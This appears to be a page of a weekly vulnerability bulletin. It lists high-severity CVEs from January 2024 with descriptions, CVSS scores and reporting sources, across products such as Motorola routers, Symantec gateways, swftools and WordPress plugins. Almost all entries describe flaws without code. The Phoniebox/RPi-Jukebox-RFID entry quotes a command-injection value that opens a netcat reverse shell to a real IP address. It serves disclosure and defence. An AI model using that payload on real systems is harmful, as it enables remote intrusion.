mayurik — online_tours_&_travels_management_system A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability. 2024-01-19 9.8 CVE-2024-0735
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
microsoft — microsoft_edge_(chromium-based)
 
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2024-01-26 9.6 CVE-2024-21326
secure@microsoft.com
microsoft — microsoft_edge_(chromium-based)
 
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2024-01-26 8.3 CVE-2024-21385
secure@microsoft.com
mintplexlabs — anythingllm AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-01-19 7.5 CVE-2024-22422
security-advisories@github.com
security-advisories@github.com
monitorr — monitorr A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-19 8.8 CVE-2024-0713
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
motorola — mr2600
 
A command injection vulnerability exists in the ‘SaveSysLogParams’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. 2024-01-26 9 CVE-2024-23626
disclosures@exodusintel.com
motorola — mr2600
 
A command injection vulnerability exists in the ‘SaveStaticRouteIPv4Params’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. 2024-01-26 9 CVE-2024-23627
disclosures@exodusintel.com
motorola — mr2600
 
A command injection vulnerability exists in the ‘SaveStaticRouteIPv6Params’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. 2024-01-26 9 CVE-2024-23628
disclosures@exodusintel.com
motorola — mr2600
 
An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information. 2024-01-26 9.6 CVE-2024-23629
disclosures@exodusintel.com
motorola — mr2600
 
An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, however can be bypassed. 2024-01-26 9 CVE-2024-23630
disclosures@exodusintel.com
mypresta — manufacturers_(brands)_images_block In the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The methods `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection. 2024-01-19 9.8 CVE-2023-46351
cve@mitre.org
cve@mitre.org
nautobot — nautobot
 
Nautobot is a Network Source of Truth and Network Automation Platform built as a web application. All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted by a cross-site scripting vulnerability. Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data. This issue is fixed in Nautobot versions 1.6.10 and 2.1.2. 2024-01-23 7.1 CVE-2024-23345
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ncr — terminal_handler Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component. 2024-01-20 8.8 CVE-2023-47024
cve@mitre.org
cve@mitre.org
netapp — ontap_9
 
ONTAP 9 versions prior to 9.9.1P18, 9.10.1P16, 9.11.1P13, 9.12.1P10 and 9.13.1P4 are susceptible to a vulnerability which could allow an authenticated user with multiple remote accounts with differing roles to perform actions via REST API beyond their intended privilege. Possible actions include viewing limited configuration details and metrics or modifying limited settings, some of which could result in a Denial of Service (DoS). 2024-01-26 7.6 CVE-2024-21985
security-alert@netapp.com
nextendweb — smart_slider_3 Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9. 2024-01-19 8.8 CVE-2022-45845
audit@patchstack.com
nvidia — bluefield_2_dpu_bmc_bluefield_3_dpu_bmc
 
NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS. 2024-01-24 7.2 CVE-2023-31037
psirt@nvidia.com
omron — cj-series_and_cs-series_cpu_modules
 
The Omron FINS protocol has an authenticated feature to prevent access to memory regions. Authentication is susceptible to bruteforce attack, which may allow an adversary to gain access to protected memory. This access can allow overwrite of values including programmed logic. 2024-01-22 8.6 CVE-2022-45790
ot-cert@dragos.com
ot-cert@dragos.com
ot-cert@dragos.com
omron — sysmac_studio
 
Project files may contain malicious contents which the software will use to create files on the filesystem. This allows directory traversal and overwriting files with the privileges of the logged-in user. 2024-01-22 7.8 CVE-2022-45792
ot-cert@dragos.com
openlibraryfoundation — mod-data-export-spring Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines. 2024-01-19 9.1 CVE-2024-23687
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
openvswitch — openvswitch openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c. 2024-01-19 7.5 CVE-2024-22563
cve@mitre.org
orthanc — osimis_dicom_web_viewer
 
A XSS payload can be uploaded as a DICOM study and when a user tries to view the infected study inside the Osimis WebViewer the XSS vulnerability gets triggered. If exploited, the attacker will be able to execute arbitrary JavaScript code inside the victim’s browser. 2024-01-23 7.1 CVE-2023-7238
ics-cert@hq.dhs.gov
pcman_ftp_server_project — pcman_ftp_server A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability. 2024-01-19 7.5 CVE-2024-0731
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pcman_ftp_server_project — pcman_ftp_server A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555. 2024-01-19 7.5 CVE-2024-0732
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
peteroupc — cbor Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application’s use of this library, this may be a remote attacker. 2024-01-19 7.5 CVE-2024-23684
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
pimcore — admin-ui-classic-bundle
 
Pimcore’s Admin Classic Bundle provides a backend user interface for Pimcore. The application allows users to create zip files from available files on the site. In the 1.x branch prior to version 1.3.2, parameter `selectedIds` is susceptible to SQL Injection. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. Version 1.3.2 contains a fix for this issue. 2024-01-24 8.8 CVE-2024-23646
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
pimcore — admin-ui-classic-bundle
 
Pimcore’s Admin Classic Bundle provides a backend user interface for Pimcore. The password reset functionality sends to the the user requesting a password change an email containing an URL to reset its password. The URL sent contains a unique token, valid during 24 hours, allowing the user to reset its password. This token is highly sensitive; as an attacker able to retrieve it would be able to resets the user’s password. Prior to version 1.2.3, the reset-password URL is crafted using the “Host” HTTP header of the request sent to request a password reset. This way, an external attacker could send password requests for users, but specify a “Host” header of a website that they control. If the user receiving the mail clicks on the link, the attacker would retrieve the reset token of the victim and perform account takeover. Version 1.2.3 fixes this issue. 2024-01-24 8.8 CVE-2024-23648
security-advisories@github.com
security-advisories@github.com
prestashopmodules — sliding_cart_block In the module “Sliding cart block” (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection. 2024-01-19 9.8 CVE-2023-50028
cve@mitre.org
cve@mitre.org
projectworlds — online_time_table_generator A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability. 2024-01-19 9.8 CVE-2024-0730
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
properfraction — profilepress Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress. This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2. 2024-01-19 7.2 CVE-2022-45083
audit@patchstack.com
prosshd — prosshd A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548. 2024-01-19 7.5 CVE-2024-0725
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
python — pillow Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter). 2024-01-19 8.1 CVE-2023-50447
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
quantumcloud — chatbot_with_ai
 
Deserialization of Untrusted Data vulnerability in QuantumCloud ChatBot with AI. This issue affects ChatBot with AI: from n/a through 5.1.0. 2024-01-24 8.7 CVE-2024-22309
audit@patchstack.com
red-hat — quarkus
 
A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security. 2024-01-25 8.6 CVE-2023-6267
secalert@redhat.com
secalert@redhat.com
red_hat — libtiff
 
An out-of-memory flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFRasterScanlineSize64() API. This flaw allows a remote attacker to cause a denial of service via a crafted input with a size smaller than 379 KB. 2024-01-25 7.5 CVE-2023-52355
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
red_hat — libtiff
 
A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service. 2024-01-25 7.5 CVE-2023-52356
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
red_hat — ovirt-engine
 
An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command. 2024-01-25 9.1 CVE-2024-0822
secalert@redhat.com
secalert@redhat.com
red_hat — shim
 
A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. 2024-01-25 8.3 CVE-2023-40547
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
smsot — smsot A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556. 2024-01-19 9.8 CVE-2024-0733
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
smsot — smsot A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability. 2024-01-19 9.8 CVE-2024-0734
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
snp_digital — salesking
 
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SNP Digital SalesKing. This issue affects SalesKing: from n/a through 1.6.15. 2024-01-24 7.5 CVE-2024-22154
audit@patchstack.com
sofastack — sofa-rpc
 
SOFARPC is a Java RPC framework. SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But, prior to version 5.12.0, there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components. Version 5.12.0 fixed this issue by adding a blacklist. SOFARPC also provides a way to add additional blacklists. Users can add a class like `-Drpc_serialize_blacklist_override=org.apache.xpath.` to avoid this issue. 2024-01-23 9.8 CVE-2024-23636
security-advisories@github.com
security-advisories@github.com
soflyy — export_any_wordpress_data_to_xml/csv The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allows high privilege users such as administrator to upload an executable file type leading to remote code execution. 2024-01-22 7.2 CVE-2023-7082
contact@wpscan.com
sourcefabric — phoniebox A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-19 9.8 CVE-2024-0714
cna@vuldb.com
cna@vuldb.com
splashtop — splashtop_software_updater
 
The C:Program Files (x86)SplashtopSplashtop Software Updateruninst.exe process creates a folder at C:WindowsTemp~nsu.tmp and copies itself to it as Au_.exe. The C:WindowsTemp~nsu.tmpAu_.exe file is automatically launched as SYSTEM when the system reboots or when a standard user runs an MSI repair using Splashtop Streamer’s Windows Installer. Since the C:WindowsTemp~nsu.tmp folder inherits permissions from C:WindowsTemp and Au_.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges. 2024-01-25 7.8 CVE-2023-3181
cve-coordination@google.com
splunk — splunk_enterprise
 
In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows. 2024-01-22 7.5 CVE-2024-23678
prodsec@splunk.com
prodsec@splunk.com
spring — spring_framework
 
In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpath Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions. 2024-01-22 7.5 CVE-2024-22233
security@vmware.com
sunnytoo — stblogsearch SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component. 2024-01-19 9.8 CVE-2023-43985
cve@mitre.org
cve@mitre.org
sveltejs — kit
 
SvelteKit is a web development kit. In SvelteKit 2, sending a GET request with a body eg `{}` to a built and previewed/hosted sveltekit app throws `Request with GET/HEAD method cannot have body.` and crashes the preview/hosting. After this happens, one must manually restart the app. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. `@sveltejs/adapter-node` versions 2.1.2, 3.0.3, and 4.0.1 and `@sveltejs/kit` version 2.4.3 contain a patch for this issue. 2024-01-24 7.5 CVE-2024-23641
security-advisories@github.com
security-advisories@github.com
swftools — swftools swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c. 2024-01-19 7.8 CVE-2024-22562
cve@mitre.org
swftools — swftools A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602. 2024-01-19 7.8 CVE-2024-22911
cve@mitre.org
swftools — swftools A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution. 2024-01-19 7.8 CVE-2024-22912
cve@mitre.org
swftools — swftools A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution. 2024-01-19 7.8 CVE-2024-22913
cve@mitre.org
swftools — swftools A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution. 2024-01-19 7.8 CVE-2024-22915
cve@mitre.org
swftools — swftools swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587. 2024-01-19 7.8 CVE-2024-22919
cve@mitre.org
swftools — swftools swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c. 2024-01-19 7.8 CVE-2024-22920
cve@mitre.org
swftools — swftools swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576. 2024-01-19 7.8 CVE-2024-22955
cve@mitre.org
swftools — swftools swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838 2024-01-19 7.8 CVE-2024-22956
cve@mitre.org
symantec — data_loss_prevention
 
A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution. 2024-01-26 9.6 CVE-2024-23617
disclosures@exodusintel.com
symantec — deployment_solution A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. 2024-01-26 10 CVE-2024-23613
disclosures@exodusintel.com
symantec — messaging_gateway
 
A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 9.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. 2024-01-26 10 CVE-2024-23614
disclosures@exodusintel.com
symantec — messaging_gateway
 
A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 10.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. 2024-01-26 10 CVE-2024-23615
disclosures@exodusintel.com
symantec — server_management_suite
 
A buffer overflow vulnerability exists in Symantec Server Management Suite version 7.9 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. 2024-01-26 10 CVE-2024-23616
disclosures@exodusintel.com
systemk_ — nvr_504
 
SystemK NVR 504/508/516 versions 2.3.5SK.30084998 and prior are vulnerable to a command injection vulnerability in the dynamic domain name system (DDNS) settings that could allow an attacker to execute arbitrary commands with root privileges. 2024-01-25 9.8 CVE-2023-7227
ics-cert@hq.dhs.gov
technicolor — tc8715d_firmware Technicolor TC8715D devices have predictable default WPA2 security passwords. An attacker who scans for SSID and BSSID values may be able to predict these passwords. 2024-01-22 8.8 CVE-2023-47352
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
thomas_belser — asgaros_forum
 
Deserialization of Untrusted Data vulnerability in Thomas Belser Asgaros Forum. This issue affects Asgaros Forum: from n/a through 2.7.2. 2024-01-24 8.7 CVE-2024-22284
audit@patchstack.com
tlsfuzzer — python-ecdsa
 
The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists. 2024-01-23 7.4 CVE-2024-23342
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
trendnet — tew-800mb
 
A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 7.2 CVE-2024-0918
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
trendnet — tew-815dap
 
A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 8.8 CVE-2024-0919
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
trendnet — tew-822dre
 
A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 7.2 CVE-2024-0920
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tutao — tutanota
 
Tuta is an encrypted email service. Starting in version 3.118.12 and prior to version 3.119.10, an attacker is able to send a manipulated email so that the user can no longer use the app to get access to received emails. By sending a manipulated email, an attacker could put the app into an unusable state. In this case, a user can no longer access received e-mails. Since the vulnerability affects not only the app, but also the web application, a user in this case has no way to access received emails. This issue was tested with iOS and the web app, but it is possible all clients are affected. Version 3.119.10 fixes this issue. 2024-01-25 7.5 CVE-2024-23655
security-advisories@github.com
security-advisories@github.com
ukrsolution — barcode_scanner_and_inventory_manager Unrestricted Upload of File with Dangerous Type vulnerability in UkrSolution Barcode Scanner and Inventory manager. This issue affects Barcode Scanner and Inventory manager: from n/a through 1.5.1. 2024-01-24 10 CVE-2023-52221
audit@patchstack.com
uniview– isc
 
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. 2024-01-22 8 CVE-2024-0778
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
unix4lyfe — darkhttpd darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel. 2024-01-22 9.8 CVE-2024-23771
cve@mitre.org
cve@mitre.org
cve@mitre.org
vite — vite
 
Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 — with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn’t discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers. 2024-01-19 7.5 CVE-2024-23331
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
weaver — e-cology An issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component. 2024-01-20 9.8 CVE-2023-51892
cve@mitre.org
cve@mitre.org
cve@mitre.org
webtoffee — order_export_&_order_import_for_woocommerce
 
Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Order Export & Order Import for WooCommerce. This issue affects Order Export & Order Import for WooCommerce: from n/a through 2.4.3. 2024-01-24 8 CVE-2024-22135
audit@patchstack.com
webtoffee — product_import_export_for_woocommerce
 
Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce. This issue affects Product Import Export for WooCommerce: from n/a through 2.3.7. 2024-01-24 8 CVE-2024-22152
audit@patchstack.com
webtoffee — stripe_payment_plugin_for_woocommerce The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘id’ parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2024-01-19 7.5 CVE-2024-0705
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 
Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP – Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet – A virtual wallet for WooCommerce, Long Watch Studio WooVIP – Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply – Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder – Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet – A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP – Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply – Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder – Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6. 2024-01-19 8.2 CVE-2022-40700
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
wordpress — wordpress
 
The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-20 7.2 CVE-2023-7063
security@wordfence.com
security@wordfence.com
wp_overnight — pdf_invoices_&_packing_slips_for_woocommerce
 
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WP Overnight PDF Invoices & Packing Slips for WooCommerce. This issue affects PDF Invoices & Packing Slips for WooCommerce: from n/a through 3.7.5. 2024-01-27 7.6 CVE-2024-22147
audit@patchstack.com
xlightftpd — xlight_ftp_server A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560. 2024-01-19 7.5 CVE-2024-0737
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
xpand-it — write-back_manager An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file. 2024-01-19 9.8 CVE-2023-27168
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonyou — yonbip An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component. 2024-01-20 9.8 CVE-2023-51906
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonyou — yonbip An arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. 2024-01-20 9.8 CVE-2023-51924
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonyou — yonbip An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. 2024-01-20 9.8 CVE-2023-51925
cve@mitre.org
cve@mitre.org
cve@mitre.org
